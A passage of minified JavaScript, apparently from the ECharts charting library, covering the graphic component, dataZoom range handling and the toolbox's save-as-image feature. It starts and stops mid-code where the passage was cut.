h=t.getAnimationStyleProps(),p=h?h.style:null;if(p){!r&&(r=i.style={});var d=W(n);for(u=0;u<d.length;u++){var f;if(p[f=d[u]]){c=o[f];r[f]=c}}}}}}(t,e,u,c)),h.style=u,function(t,e,n){var i=e.style;if(!t.isGroup&&i){if(n){t.useStyle({});for(var r=t.animators,o=0;o<r.length;o++){var a=r[o];"style"===a.targetName&&a.changeTarget(t.style)}}t.setStyle(i)}e&&(e.style=null,e&&t.attr(e),e.style=i)}(t,h,a),function(t,e){wt(e,"silent")&&(t.silent=e.silent),wt(e,"ignore")&&(t.ignore=e.ignore),t instanceof Rs&&wt(e,"invisible")&&(t.invisible=e.invisible);t instanceof Bl&&wt(e,"autoBatch")&&(t.autoBatch=e.autoBatch)}(t,e),s)if(o){var g={};E(AD,function(t){var n=t?e[t]:e;n&&n.enterFrom&&(t&&(g[t]=g[t]||{}),A(t?g[t]:g,n.enterFrom))});var v=LD("enter",t,e,n,r);v.duration>0&&t.animateFrom(g,v)}else!function(t,e,n,i,r){if(r){var o=LD("update",t,e,i,n);o.duration>0&&t.animateFrom(r,o)}}(t,e,r||0,n,c);RD(t,e),u?t.dirty():t.markRedraw()}function RD(t,e){for(var n=PD(t).leaveToProps,i=0;i<AD.length;i++){var r=AD[i],o=r?e[r]:e;o&&o.leaveTo&&(n||(n=PD(t).leaveToProps={}),r&&(n[r]=n[r]||{}),A(r?n[r]:n,o.leaveTo))}}function ND(t){return"all"===t}var BD={},zD={setTransform:function(t,e){return BD.el[t]=e,this},getTransform:function(t){return BD.el[t]},setShape:function(t,e){var n=BD.el;return(n.shape||(n.shape={}))[t]=e,n.dirtyShape&&n.dirtyShape(),this},getShape:function(t){var e=BD.el.shape;if(e)return e[t]},setStyle:function(t,e){var n=BD.el,i=n.style;return i&&(i[t]=e,n.dirtyStyle&&n.dirtyStyle()),this},getStyle:function(t){var e=BD.el.style;if(e)return e[t]},setExtra:function(t,e){return(BD.el.extra||(BD.el.extra={}))[t]=e,this},getExtra:function(t){var e=BD.el.extra;if(e)return e[t]}};function ED(){var t=this,e=t.el;if(e){var n=PD(e).userDuring,i=t.userDuring;n===i?(BD.el=e,i(zD)):t.el=t.userDuring=null}}function VD(t,e,n,i){var r=n[t];if(r){var o,a=e[t];if(a){var s=n.transition,l=r.transition;if(l)if(!o&&(o=i[t]={}),ND(l))A(o,a);else for(var u=da(l),c=0;c<u.length;c++){var h=a[d=u[c]];o[d]=h}else if(ND(s)||R(s,t)>=0){!o&&(o=i[t]={});var p=W(a);for(c=0;c<p.length;c++){var d;h=a[d=p[c]];HD(r[d],h)&&(o[d]=h)}}}}}function FD(t,e,n){var i=e[t];if(i)for(var r=n[t]={},o=W(i),a=0;a<o.length;a++){var s=o[a];r[s]=ji(i[s])}}function HD(t,e){return z(t)?t!==e:null!=t&&isFinite(t)}var GD=Ta(),WD=["percent","easing","shape","style","extra"];function UD(t,e,n){if(n.isAnimationEnabled()&&e)if(Y(e))E(e,function(e){UD(t,e,n)});else{var i=e.keyframes,r=e.duration;if(n&&null==r){var o=Rh("enter",n,0);r=o&&o.duration}if(i&&r){var a=GD(t);E(AD,function(n){if(!n||t[n]){var o;i.sort(function(t,e){return t.percent-e.percent}),E(i,function(i){var s=t.animators,l=n?i[n]:i;if(l){var u=W(l);if(n||(u=H(u,function(t){return R(WD,t)<0})),u.length){o||((o=t.animate(n,e.loop,!0)).scope="keyframe");for(var c=0;c<s.length;c++)s[c]!==o&&s[c].targetName===o.targetName&&s[c].stopTracks(u);n&&(a[n]=a[n]||{});var h=n?a[n]:a;E(u,function(e){h[e]=((n?t[n]:t)||{})[e]}),o.whenWithKeys(r*i.percent,l,u,i.easing)}}}),o&&o.delay(e.delay||0).duration(r).start(e.easing)}})}}}var ZD={path:null,compoundPath:null,group:ho,image:Hl,text:Ql},YD=Ta(),XD=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.init=function(){this._elMap=mt()},e.prototype.render=function(t,e,n){t!==this._lastGraphicModel&&this._clear(),this._lastGraphicModel=t,this._updateElements(t),this._relocate(t,n)},e.prototype._updateElements=function(t){var e=t.useElOptionsToUpdate();if(e){var n=this._elMap,i=this.group,r=t.get("z"),o=t.get("zlevel");E(e,function(e){var a=ba(e.id,null),s=null!=a?n.get(a):null,l=ba(e.parentId,null),u=null!=l?n.get(l):i,c=e.type,h=e.style;"text"===c&&h&&e.hv&&e.hv[1]&&(h.textVerticalAlign=h.textBaseline=h.verticalAlign=h.align=null);var p=e.textContent,d=e.textConfig;if(h&&function(t,e,n,i){return t&&(t.legacy||!1!==t.legacy&&!n&&!i&&"tspan"!==e&&("text"===e||wt(t,"text")))}(h,c,!!d,!!p)){var f=function(t,e,n){var i,r,o,a=t;if("text"===e)o=a;else{o={},wt(a,"text")&&(o.text=a.text),wt(a,"rich")&&(o.rich=a.rich),wt(a,"textFill")&&(o.fill=a.textFill),wt(a,"textStroke")&&(o.stroke=a.textStroke),wt(a,"fontFamily")&&(o.fontFamily=a.fontFamily),wt(a,"fontSize")&&(o.fontSize=a.fontSize),wt(a,"fontStyle")&&(o.fontStyle=a.fontStyle),wt(a,"fontWeight")&&(o.fontWeight=a.fontWeight),r={type:"text",style:o,silent:!0},i={};var s=wt(a,"textPosition");n?i.position=s?a.textPosition:"inside":s&&(i.position=a.textPosition),wt(a,"textPosition")&&(i.position=a.textPosition),wt(a,"textOffset")&&(i.offset=a.textOffset),wt(a,"textRotation")&&(i.rotation=a.textRotation),wt(a,"textDistance")&&(i.distance=a.textDistance)}return KT(o,t),E(o.rich,function(t){KT(t,t)}),{textConfig:i,textContent:r}}(h,c,!0);!d&&f.textConfig&&(d=e.textConfig=f.textConfig),!p&&f.textContent&&(p=f.textContent)}var g=function(t){return t=A({},t),E(["id","parentId","$action","hv","bounding","textContent","clipPath"].concat(pf),function(e){delete t[e]}),t}(e);var v=e.$action||"merge",y="merge"===v,m="replace"===v;if(y){var _=s;(k=!s)?_=qD(a,u,e.type,n):(_&&(YD(_).isNew=!1),function(t){t.stopAnimation("keyframe"),t.attr(GD(t))}(_)),_&&(OD(_,g,t,{isInit:k}),$D(_,e,r,o))}else if(m){KD(s,e,n,t);var x=qD(a,u,e.type,n);x&&(OD(x,g,t,{isInit:!0}),$D(x,e,r,o))}else"remove"===v&&(RD(s,e),KD(s,e,n,t));var b=n.get(a);if(b&&p)if(y){var w=b.getTextContent();w?w.attr(p):b.setTextContent(new Ql(p))}else m&&b.setTextContent(new Ql(p));if(b){var S=e.clipPath;if(S){var M=S.type,T=void 0,k=!1;if(y){var C=b.getClipPath();T=(k=!C||YD(C).type!==M)?jD(M):C}else m&&(k=!0,T=jD(M));b.setClipPath(T),OD(T,S,t,{isInit:k}),UD(T,S.keyframeAnimation,t)}var I=YD(b);b.setTextConfig(d),I.option=e,function(t,e,n){var i=hu(t).eventData;t.silent||t.ignore||i||(i=hu(t).eventData={componentType:"graphic",componentIndex:e.componentIndex,name:t.name});i&&(i.info=n.info)}(b,t,e),yp({el:b,componentModel:t,itemName:b.name,itemTooltipOption:e.tooltip}),UD(b,e.keyframeAnimation,t)}})}},e.prototype._relocate=function(t,e){for(var n=t.option.elements,i=this.group,r=this._elMap,o=e.getWidth(),a=e.getHeight(),s=["x","y"],l=0;l<n.length;l++){if((f=null!=(d=ba((p=n[l]).id,null))?r.get(d):null)&&f.isGroup){var u=(g=f.parent)===i,c=YD(f),h=YD(g);c.width=No(c.option.width,u?o:h.width)||0,c.height=No(c.option.height,u?a:h.height)||0}}for(l=n.length-1;l>=0;l--){var p,d,f;if(f=null!=(d=ba((p=n[l]).id,null))?r.get(d):null){var g=f.parent,v=(h=YD(g),{}),y=xf(f,p,g===i?{width:o,height:a}:{width:h.width,height:h.height},null,{hv:p.hv,boundingMode:p.bounding},v);if(!YD(f).isNew&&y){for(var m=p.transition,_={},x=0;x<s.length;x++){var b=s[x],w=v[b];m&&(ND(m)||R(m,b)>=0)?_[b]=w:f[b]=w}Bh(f,_,t,0)}else f.attr(v)}}},e.prototype._clear=function(){var t=this,e=this._elMap;e.each(function(n){KD(n,YD(n).option,e,t._lastGraphicModel)}),this._elMap=mt()},e.prototype.dispose=function(){this._clear()},e.type="graphic",e}(ay);function jD(t){var e=wt(ZD,t)?ZD[t]:Kh(t);var n=new e({});return YD(n).type=t,n}function qD(t,e,n,i){var r=jD(n);return e.add(r),i.set(t,r),YD(r).id=t,YD(r).isNew=!0,r}function KD(t,e,n,i){t&&t.parent&&("group"===t.type&&t.traverse(function(t){KD(t,e,n,i)}),function(t,e,n,i){if(t){var r=t.parent,o=PD(t).leaveToProps;if(o){var a=LD("update",t,e,n,0);a.done=function(){r&&r.remove(t),i&&i()},t.animateTo(o,a)}else r&&r.remove(t),i&&i()}}(t,e,i),n.removeKey(YD(t).id))}function $D(t,e,n,i){t.isGroup||E([["cursor",Rs.prototype.cursor],["zlevel",i||0],["z",n||0],["z2",0]],function(n){var i=n[0];wt(e,i)?t[i]=at(e[i],n[1]):null==t[i]&&(t[i]=n[1])}),E(W(e),function(n){if(0===n.indexOf("on")){var i=e[n];t[n]=X(i)?i:null}}),wt(e,"draggable")&&(t.draggable=e.draggable),null!=e.name&&(t.name=e.name),null!=e.id&&(t.id=e.id)}var QD=["x","y","radius","angle","single"],JD=Ta(),tA=["cartesian2d","polar","singleAxis"];function eA(t){return t+"Axis"}function nA(t,e){var n,i=mt(),r=[],o=mt();t.eachComponent({mainType:"dataZoom",query:e},function(t){o.get(t.uid)||s(t)});do{n=!1,t.eachComponent("dataZoom",a)}while(n);function a(t){!o.get(t.uid)&&function(t){var e=!1;return t.eachTargetAxis(function(t,n){var r=i.get(t);r&&r[n]&&(e=!0)}),e}(t)&&(s(t),n=!0)}function s(t){o.set(t.uid,!0),r.push(t),t.eachTargetAxis(function(t,e){(i.get(t)||i.set(t,[]))[e]=!0})}return r}function iA(t){var e=t.ecModel,n={infoList:[],infoMap:mt()};return t.eachTargetAxis(function(t,i){var r=e.getComponent(eA(t),i);if(r){var o=r.getCoordSysModel();if(o){var a=o.uid,s=n.infoMap.get(a);s||(s={model:o,axisModels:[]},n.infoList.push(s),n.infoMap.set(a,s)),s.axisModels.push(r)}}}),n}function rA(t){var e=JD(hm(t));return e.axisProxyMap||(e.axisProxyMap=mt())}function oA(t){if(t)return rA(t.ecModel).get(t.uid)}function aA(t,e){var n=e.getAxisModel().axis.__alignTo;return n&&t.getAxisProxy(n.dim,n.model.componentIndex)?oA(n.model):null}var sA=function(){function t(){this.indexList=[],this.indexMap=[]}return t.prototype.add=function(t){this.indexMap[t]||(this.indexList.push(t),this.indexMap[t]=!0)},t}(),lA=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n._autoThrottle=!0,n._noTarget=!0,n._rangePropMode=["percent","percent"],n}return n(e,t),e.prototype.init=function(t,e,n){var i=uA(t);this.settledOption=i,this.mergeDefaultAndTheme(t,n),this._doInit(i)},e.prototype.mergeOption=function(t){var e=uA(t);I(this.option,t,!0),I(this.settledOption,e,!0),this._doInit(e)},e.prototype._doInit=function(t){var e=this.option;this._setDefaultThrottle(t),this._updateRangeUse(t);var n=this.settledOption;E([["start","startValue"],["end","endValue"]],function(t,i){"value"===this._rangePropMode[i]&&(e[t[0]]=n[t[0]]=null)},this),this._resetTarget()},e.prototype._resetTarget=function(){var t=this.get("orient",!0),e=this._targetAxisInfoMap=mt();this._fillSpecifiedTargetAxis(e)?this._orient=t||this._makeAutoOrientByTargetAxis():(this._orient=t||"horizontal",this._fillAutoTargetAxisByOrient(e,this._orient)),this._noTarget=!0,e.each(function(t){t.indexList.length&&(this._noTarget=!1)},this)},e.prototype._fillSpecifiedTargetAxis=function(t){var e=!1;return E(QD,function(n){var i=this.getReferringComponents(eA(n),Aa);if(i.specified){e=!0;var r=new sA;E(i.models,function(t){r.add(t.componentIndex)}),t.set(n,r)}},this),e},e.prototype._fillAutoTargetAxisByOrient=function(t,e){var n=this.ecModel,i=!0;if(i){var r="vertical"===e?"y":"x";o(n.findComponents({mainType:r+"Axis"}),r)}i&&o(n.findComponents({mainType:"singleAxis",filter:function(t){return t.get("orient",!0)===e}}),"single");function o(e,n){var r=e[0];if(r){var o=new sA;if(o.add(r.componentIndex),t.set(n,o),i=!1,"x"===n||"y"===n){var a=r.getReferringComponents("grid",Da).models[0];a&&E(e,function(t){r.componentIndex!==t.componentIndex&&a===t.getReferringComponents("grid",Da).models[0]&&o.add(t.componentIndex)})}}}i&&E(QD,function(e){if(i){var r=n.findComponents({mainType:eA(e),filter:function(t){return"category"===t.get("type",!0)}});if(r[0]){var o=new sA;o.add(r[0].componentIndex),t.set(e,o),i=!1}}},this)},e.prototype._makeAutoOrientByTargetAxis=function(){var t;return this.eachTargetAxis(function(e){!t&&(t=e)},this),"y"===t?"vertical":"horizontal"},e.prototype._setDefaultThrottle=function(t){if(t.hasOwnProperty("throttle")&&(this._autoThrottle=!1),this._autoThrottle){var e=this.ecModel.option;this.option.throttle=e.animation&&e.animationDurationUpdate>0?100:20}},e.prototype._updateRangeUse=function(t){var e=this._rangePropMode,n=this.get("rangeMode");E([["start","startValue"],["end","endValue"]],function(i,r){var o=null!=t[i[0]],a=null!=t[i[1]];o&&!a?e[r]="percent":!o&&a?e[r]="value":n?e[r]=n[r]:o&&(e[r]="percent")})},e.prototype.noTarget=function(){return this._noTarget},e.prototype.getFirstTargetAxisModel=function(){var t;return this.eachTargetAxis(function(e,n){null==t&&(t=this.ecModel.getComponent(eA(e),n))},this),t},e.prototype.eachTargetAxis=function(t,e){this._targetAxisInfoMap.each(function(n,i){E(n.indexList,function(n){t.call(e,i,n)})})},e.prototype.getAxisProxy=function(t,e){return oA(this.getAxisModel(t,e))},e.prototype.getAxisModel=function(t,e){var n=this._targetAxisInfoMap.get(t);if(n&&n.indexMap[e])return this.ecModel.getComponent(eA(t),e)},e.prototype.setRawRange=function(t){var e=this.option,n=this.settledOption;E([["start","startValue"],["end","endValue"]],function(i){null==t[i[0]]&&null==t[i[1]]||(e[i[0]]=n[i[0]]=t[i[0]],e[i[1]]=n[i[1]]=t[i[1]])},this),this._updateRangeUse(t)},e.prototype.setCalculatedRange=function(t){var e=this.option;E(["start","startValue","end","endValue"],function(n){e[n]=t[n]})},e.prototype.getPercentRange=function(){var t=this.findRepresentativeAxisProxy();if(t)return t.getWindow().percent},e.prototype.getValueRange=function(t,e){if(null!=t||null!=e)return this.getAxisProxy(t,e).getWindow().value;var n=this.findRepresentativeAxisProxy();return n?n.getWindow().value:void 0},e.prototype.findRepresentativeAxisProxy=function(t){if(t)return oA(t);for(var e,n=this._targetAxisInfoMap.keys(),i=0;i<n.length;i++)for(var r=n[i],o=this._targetAxisInfoMap.get(r),a=0;a<o.indexList.length;a++){var s=this.getAxisProxy(r,o.indexList[a]);if(s.hostedBy(this))return s;e||(e=s)}return e},e.prototype.getRangePropMode=function(){return this._rangePropMode.slice()},e.prototype.getOrient=function(){return this._orient},e.type="dataZoom",e.dependencies=["xAxis","yAxis","radiusAxis","angleAxis","singleAxis","series","toolbox"],e.defaultOption={z:4,filterMode:"filter",start:0,end:100},e}(kf);function uA(t){var e={};return E(["start","end","startValue","endValue","throttle"],function(n){t.hasOwnProperty(n)&&(e[n]=t[n])}),e}var cA=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.type="dataZoom.select",e}(lA),hA=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.render=function(t,e,n,i){this.dataZoomModel=t,this.ecModel=e,this.api=n},e.type="dataZoom",e}(ay),pA=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.type="dataZoom.select",e}(hA);function dA(t,e,n,i,r,o){t=t||0;var a=Wo(n[1],-n[0]);if(null!=r&&(r=gA(r,[0,a])),null!=o&&(o=Math.max(o,null!=r?r:0)),"all"===i){var s=Math.abs(Wo(e[1],-e[0]));s=gA(s,[0,a]),r=o=gA(s,[r,o]),i=0}e[0]=gA(e[0],n),e[1]=gA(e[1],n);var l=fA(e,i);e[i]+=t;var u,c=r||0,h=n.slice();return l.sign<0?h[0]=Wo(h[0],c):h[1]=Wo(h[1],-c),e[i]=gA(e[i],h),u=fA(e,i),null!=r&&(u.sign!==l.sign||u.span<r)&&(e[1-i]=Wo(e[i],l.sign*r)),u=fA(e,i),null!=o&&u.span>o&&(e[1-i]=Wo(e[i],u.sign*o)),e}function fA(t,e){var n=t[e]-t[1-e];return{span:Math.abs(n),sign:n>0?-1:n<0?1:e?-1:1}}function gA(t,e){return Math.min(null!=e[1]?e[1]:1/0,Math.max(null!=e[0]?e[0]:-1/0,t))}var vA=function(){function t(t,e,n,i){this._dimName=t,this._axisIndex=e,this.ecModel=i,this._dataZoomModel=n}return t.prototype.hostedBy=function(t){return this._dataZoomModel===t},t.prototype.getWindow=function(){return C(this._window)},t.prototype.getTargetSeriesModels=function(){var t=[];return this.ecModel.eachSeries(function(e){if(function(t){var e=t.get("coordinateSystem");return R(tA,e)>=0}(e)){var n=eA(this._dimName),i=e.getReferringComponents(n,Da).models[0];i&&this._axisIndex===i.componentIndex&&t.push(e)}},this),t},t.prototype.getAxisModel=function(){return this.ecModel.getComponent(this._dimName+"Axis",this._axisIndex)},t.prototype.getMinMaxSpan=function(){return C(this._minMaxSpan)},t.prototype.calculateDataWindow=function(t){var e,n=this._extent,i=this.getAxisModel().axis,r=i.scale,o=this._dataZoomModel.getRangePropMode(),a=[0,100],s=[],l=[],u=[!1,!1];E(["start","end"],function(i,c){var h=t[i],p=t[i+"Value"];"percent"===o[c]?(null==h&&(h=a[c]),p=Ro(h,a,n),u[c]=!0):(e=!0,null==p?p=n[c]:(p=r.parse(p),r.sanitize&&(p=r.sanitize(p,n))),h=Ro(p,n,a)),l[c]=null==p||isNaN(p)?n[c]:p,s[c]=null==h||isNaN(h)?a[c]:h}),Eo(l),Eo(s);var c=this._minMaxSpan;function h(t,e,n,i,r){var o=r?"Span":"ValueSpan";dA(0,t,n,"all",c["min"+o],c["max"+o]);for(var a=0;a<2;a++)e[a]=Ro(t[a],n,i,!0),r&&(e[a]=e[a],u[a]=!0);Va(e)}e?h(l,s,n,a,!1):h(s,l,a,n,!0);var p=xb(r)||mb(r),d=i.getExtent(),f=To(d[1]-d[0]),g=p?0:Ho(l,f,.5);E([[0,Io],[1,Co]],function(t){var e=t[0],i=t[1];u[e]&&isFinite(g)&&(l[e]=zo(l[e],g),l[e]=So(n[1],Mo(n[0],l[e])),s[e]===a[e]&&(l[e]=n[e],p&&(l[e]=i(l[e]))))}),Va(l);var v=[Ro(l[0],n,a,!0),Ro(l[1],n,a,!0)];return Va(v),{value:l,percent:s,percentInverted:v,valuePrecision:g}},t.prototype.reset=function(t,e){if(this.hostedBy(t)){var n=this.getAxisModel().axis;Dw(n,2);var i=n.scale.rawExtentInfo;this._extent=i.makeNoZoom(),this._updateMinMaxSpan();var r=t.settledOption;e&&(r=L({start:e[0],end:e[1]},r));var o=this._window=this.calculateDataWindow(r),a=o.percent,s=o.value;0!==a[0]&&i.setZoomMM(0,s[0]),100!==a[1]&&i.setZoomMM(1,s[1])}},t.prototype.filterData=function(t,e){if(this.hostedBy(t)){var n=this._dimName,i=this.getTargetSeriesModels(),r=t.get("filterMode"),o=this._window.value;"none"!==r&&E(i,function(t){var e=t.getData(),i=e.mapDimensionsAll(n);if(i.length){if("weakFilter"===r){var a=e.getStore(),s=V(i,function(t){return e.getDimensionIndex(t)},e);e.filterSelf(function(t){for(var e,n,r,l=0;l<i.length;l++){var u=a.get(s[l],t),c=!isNaN(u),h=u<o[0],p=u>o[1];if(c&&!h&&!p)return!0;c&&(r=!0),h&&(e=!0),p&&(n=!0)}return r&&e&&n})}else E(i,function(n){if("empty"===r)t.setData(e=e.map(n,function(t){return function(t){return t>=o[0]&&t<=o[1]}(t)?t:NaN}));else{var i={};i[n]=o,e.selectRange(i)}});E(i,function(t){e.setApproximateExtent(o,t)})}})}},t.prototype._updateMinMaxSpan=function(){var t=this._minMaxSpan={},e=this._dataZoomModel,n=this._extent;E(["min","max"],function(i){var r=e.get(i+"Span"),o=e.get(i+"ValueSpan");null!=o&&(o=this.getAxisModel().axis.scale.parse(o)),null!=o?r=Ro(n[0]+o,n,[0,100],!0):null!=r&&(o=Ro(r,[0,100],n,!0)-n[0]),t[i+"Span"]=r,t[i+"ValueSpan"]=o},this)},t}(),yA={dirtyOnOverallProgress:!0,getTargetSeries:function(t){var e,n=[];e=function(e,i,r,o){if(!oA(r)){var a=new vA(e,i,o,t);n.push(a),function(t,e){rA(t.ecModel).set(t.uid,e)}(r,a)}},t.eachComponent("dataZoom",function(n){n.eachTargetAxis(function(i,r){var o=t.getComponent(eA(i),r);e(i,r,o,n)})});var i=mt();return E(n,function(t){E(t.getTargetSeriesModels(),function(t){i.set(t.uid,t)})}),i},overallReset:function(t,e){t.eachComponent("dataZoom",function(t){var n=[];t.eachTargetAxis(function(e,i){var r=t.getAxisProxy(e,i),o=aA(t,r);o?n.push([r,o]):r.reset(t,null)}),E(n,function(e){e[0].reset(t,e[1].getWindow().percentInverted)}),t.eachTargetAxis(function(n,i){t.getAxisProxy(n,i).filterData(t,e)})}),t.eachComponent("dataZoom",function(t){var e=t.findRepresentativeAxisProxy();if(e){var n=e.getWindow(),i=n.percent,r=n.value;t.setCalculatedRange({start:i[0],end:i[1],startValue:r[0],endValue:r[1]})}})}};var mA=Fa();function _A(t){mA(t,function(){t.registerProcessor(t.PRIORITY.PROCESSOR.FILTER,yA),function(t){t.registerAction("dataZoom",function(t,e){E(nA(e,t),function(e){e.setRawRange({start:t.start,end:t.end,startValue:t.startValue,endValue:t.endValue})})})}(t),t.registerSubTypeDefaulter("dataZoom",function(){return"slider"})})}function xA(t){t.registerComponentModel(cA),t.registerComponentView(pA),_A(t)}var bA=function(){},wA={};function SA(t,e){wA[t]=e}function MA(t){return wA[t]}var TA=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.init=function(e,n,i){var r=i.getTheme().get("toolbox"),o=r?r.feature:null;o&&(this._themeFeatureOption=A({},o),r.feature={}),t.prototype.init.call(this,e,n,i),o&&(r.feature=o)},e.prototype.optionUpdated=function(){E(this.option.feature,function(t,e){var n=this._themeFeatureOption,i=MA(e);i&&(i.getDefaultOption&&(i.defaultOption=i.getDefaultOption(this.ecModel)),n&&n[e]&&(I(t,n[e]),n[e]=null),I(t,i.defaultOption))},this)},e.type="toolbox",e.layoutMode={type:"box",ignoreSize:!0},e.defaultOption={show:!0,z:6,orient:"horizontal",left:"right",top:"top",backgroundColor:"transparent",borderColor:Cf.color.border,borderRadius:0,borderWidth:0,padding:Cf.size.m,itemSize:15,itemGap:Cf.size.s,showTitle:!0,iconStyle:{borderColor:Cf.color.accent50,color:"none"},emphasis:{iconStyle:{borderColor:Cf.color.accent70}},tooltip:{show:!1,position:"bottom"}},e}(kf);function kA(t,e){var n=Kd(e.get("padding")),i=e.getItemStyle(["color","opacity"]);return i.fill=e.get("backgroundColor"),new jl({shape:{x:t.x-n[3],y:t.y-n[0],width:t.width+n[1]+n[3],height:t.height+n[0]+n[2],r:e.get("borderRadius")},style:i,silent:!0,z2:-1})}var CA=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.render=function(t,e,n,i){var r=this.group;if(r.removeAll(),t.get("show")){var o=+t.get("itemSize"),a="vertical"===t.get("orient"),s=t.get("feature")||{},l=this._features||(this._features=mt()),u=[];E(s,function(t,e){u.push(e)}),new Sx(this._featureNames||[],u).add(f).update(f).remove(Z(f,null)).execute(),this._featureNames=H(u,function(t){return l.hasKey(t)});var c=_f(t,n).refContainer,h=t.getBoxLayoutParams(),p=t.get("padding"),d=yf(h,c,p);gf(t.get("orient"),r,t.get("itemGap"),d.width,d.height),xf(r,h,c,p),r.add(kA(r.getBoundingRect(),t)),a||r.eachChild(function(t){var e=t.__title,i=t.ensureState("emphasis"),a=i.textConfig||(i.textConfig={}),s=t.getTextContent(),l=s&&s.ensureState("emphasis");if(l&&!X(l)&&e){var u=l.style||(l.style={}),c=Zr(e,Ql.makeFont(u)),h=t.x+r.x,p=!1;t.y+r.y+o+c.height>n.getHeight()&&(a.position="top",p=!0);var d=p?-5-c.height:o+10;h+c.width/2>n.getWidth()?(a.position=["100%",d],u.align="right"):h-c.width/2<0&&(a.position=[0,d],u.align="left")}})}function f(c,h){var p,d=null!=c&&null==h,f=null!=c&&null!=h,g=null==c,v=d||f?u[c]:u[h],y=s[v],m=d||f?new td(y,t,e):null,_=m&&m.get("show");if(d){if(!_)return;if(function(t){return 0===t.indexOf("my")}(v))p={onclick:m.option.onclick,featureName:v};else{var x=MA(v);if(!x)return;p=new x}l.set(v,p)}else p=l.get(v);if(g||!_)return IA(p)&&p.dispose&&p.dispose(e,n),void l.removeKey(v);i&&null!=i.newTitle&&i.featureName===v&&(y.title=i.newTitle),d&&(p.uid=nd("toolbox-feature")),p.model=m,p.ecModel=e,p.api=n,function(i,s,l){var u,c,h=i.getModel("iconStyle"),p=i.getModel(["emphasis","iconStyle"]),d=s instanceof bA&&s.getIcons?s.getIcons():i.get("icon"),f=i.get("title")||{};j(d)?(u={})[l]=d:u=d;j(f)?(c={})[l]=f:c=f;var g=i.iconPaths={};E(u,function(l,u){var d=hp(l,{},{x:-o/2,y:-o/2,width:o,height:o});d.setStyle(h.getItemStyle()),d.ensureState("emphasis").style=p.getItemStyle();var f=new Ql({style:{text:c[u],align:p.get("textAlign"),borderRadius:p.get("textBorderRadius"),padding:p.get("textPadding"),fill:null,font:Vp({fontStyle:p.get("textFontStyle"),fontFamily:p.get("textFontFamily"),fontSize:p.get("textFontSize"),fontWeight:p.get("textFontWeight")},e)},ignore:!0});d.setTextContent(f),yp({el:d,componentModel:t,itemName:u,formatterParamsExtra:{title:c[u]}}),d.__title=c[u],d.on("mouseover",function(){var e=p.getItemStyle(),i=a?null==t.get("right")&&"right"!==t.get("left")?"right":"left":null==t.get("bottom")&&"bottom"!==t.get("top")?"bottom":"top";f.setStyle({fill:p.get("textFill")||e.fill||e.stroke||Cf.color.neutral99,backgroundColor:p.get("textBackgroundColor")}),d.setTextConfig({position:p.get("textPosition")||i}),f.ignore=!t.get("showTitle"),n.enterEmphasis(this)}).on("mouseout",function(){"emphasis"!==i.get(["iconStatus",u])&&n.leaveEmphasis(this),f.hide()}),("emphasis"===i.get(["iconStatus",u])?Qu:Ju)(d),r.add(d),d.on("click",U(s.onclick,s,e,n,u)),g[u]=d})}(m,p,v),m.setIconStatus=function(t,e){var n=this.option,i=this.iconPaths;n.iconStatus=n.iconStatus||{},n.iconStatus[t]=e,i[t]&&("emphasis"===e?Qu:Ju)(i[t])},IA(p)&&p.render&&p.render(m,e,n,i)}},e.prototype.updateView=function(t,e,n,i){E(this._features,function(t){t&&t instanceof bA&&t.updateView&&t.updateView(t.model,e,n,i)})},e.prototype.dispose=function(t,e){E(this._features,function(n){n&&n instanceof bA&&n.dispose&&n.dispose(t,e)})},e.type="toolbox",e}(ay);function IA(t){return t instanceof bA}var DA=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.onclick=function(t,e){var n=this.model,i=n.get("name")||t.get("title.0.text")||"echarts",o="svg"===e.getZr().painter.getType(),a=o?"svg":n.get("type",!0)||"png",s=e.getConnectedDataURL({type:a,backgroundColor:n.get("backgroundColor",!0)||t.get("backgroundColor")||Cf.color.neutral00,connectedBackgroundColor:n.get("connectedBackgroundColor"),excludeComponents:n.get("excludeComponents"),pixelRatio:n.get("pixelRatio")}),l=r.browser;if("function"!=typeof MouseEvent||!l.newEdge&&(l.ie||l.edge))if(window.navigator.msSaveOrOpenBlob||o){var u=s.split(","),c=u[0].indexOf("base64")>-1,h=o?decodeURIComponent(u[1]):u[1];c&&(h=window.atob(h));var p=i+"."+a;if(window.navigator.msSaveOrOpenBlob){for(var d=h.length,f=new Uint8Array(d);d--;)f[d]=h.charCodeAt(d);var g=new Blob([f]);window.navigator.msSaveOrOpenBlob(g,p)}else{var v=document.createElement("iframe");document.body.appendChild(v);var y=v.contentWindow,m=y.document;m.open("image/svg+xml","replace"),m.write(h),m.close(),y.focus(),m.execCommand("SaveAs",!0,p),document.body.removeChild(v)}}else{var _=n.get("lang"),x='<body style="margin:0;"><img src="'+s+'" style="max-width:100%;" title="'+(_&&_[0]||"")+'" /></body>',b=window.open();b.document.write(x),b.document.title=i}else{var w=document.createElement("a");w.download=i+"."+a,w.target="_blank",w.href=s;var S=new MouseEvent("click",{view:document.defaultView,bubbles:!0,cancelable:!1});w.dispatchEvent(S)}},e.getDefaultOption=function(t){return{show:!0,icon:"M4.7,22.9L29.3,45.5L54.7,23.4M4.6,43.6L4.6,58L53.8,58L53.8,43.6M29.2,45.1L29.2,0",title:t.getLocaleModel().get(["toolbox","saveAsImage","title"]),type:"png",connectedBackgroundColor:Cf.color.neutral00,name:"",excludeComponents:["toolbox"],lang:t.getLocaleModel().get(["toolbox","saveAsImage","lang"])}},e}(bA),AA="__ec_magicType_stack__",PA=[["line","bar"],["stack"]],LA=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.getIcons=function(){var t=this.model,e=t.get("icon"),n={};return 